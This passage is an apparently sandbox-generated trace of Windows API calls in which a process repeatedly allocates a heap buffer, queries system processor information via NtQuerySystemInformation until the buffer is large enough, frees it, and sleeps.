[0170.758] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0170.759] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.760] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0170.760] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0170.761] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.761] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0170.761] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0170.761] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.762] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0170.762] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0170.762] Sleep (dwMilliseconds=0x110) [0171.089] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0171.089] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.090] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0171.090] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.090] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0171.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.091] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0171.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0171.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0171.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.093] Sleep (dwMilliseconds=0x110) [0171.385] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0171.385] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.386] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.386] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0171.387] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.387] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.387] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0171.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.388] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0171.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0171.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0171.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.390] Sleep (dwMilliseconds=0x110) [0171.681] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0171.681] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.682] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.682] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0171.683] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.683] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.683] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0171.684] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.684] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0171.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0171.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0171.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.686] Sleep (dwMilliseconds=0x110) [0171.964] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0171.964] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.965] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.965] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0171.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.966] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0171.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0171.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0171.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0171.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0171.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0171.970] Sleep (dwMilliseconds=0x110) [0172.291] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0172.291] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.291] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.292] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0172.292] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.292] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.293] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0172.293] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.293] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.293] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0172.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0172.294] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0172.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.295] Sleep (dwMilliseconds=0x110) [0172.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0172.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0172.632] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.633] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.637] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0172.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0172.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0172.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0172.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.662] Sleep (dwMilliseconds=0x110) [0172.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0172.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0172.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0172.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0172.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0172.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0172.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.800] Sleep (dwMilliseconds=0x110) [0172.822] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0172.822] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.822] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.823] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0172.823] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.823] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.824] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0172.824] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0172.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0172.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0172.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.834] Sleep (dwMilliseconds=0x110) [0172.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0172.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0172.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0172.865] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0172.866] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0172.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.866] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0172.867] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.867] Sleep (dwMilliseconds=0x110) [0172.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0172.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0172.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0172.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0172.913] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0172.914] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.914] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0172.915] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.915] Sleep (dwMilliseconds=0x110) [0172.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0172.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0172.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0172.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0172.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0172.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0172.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.992] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0172.993] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0172.993] Sleep (dwMilliseconds=0x110) [0173.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.056] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.057] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.057] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.057] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.058] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.058] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.059] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.059] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.059] Sleep (dwMilliseconds=0x110) [0173.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0173.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0173.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0173.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0173.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0173.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.289] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0173.290] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0173.290] Sleep (dwMilliseconds=0x110) [0173.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0173.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 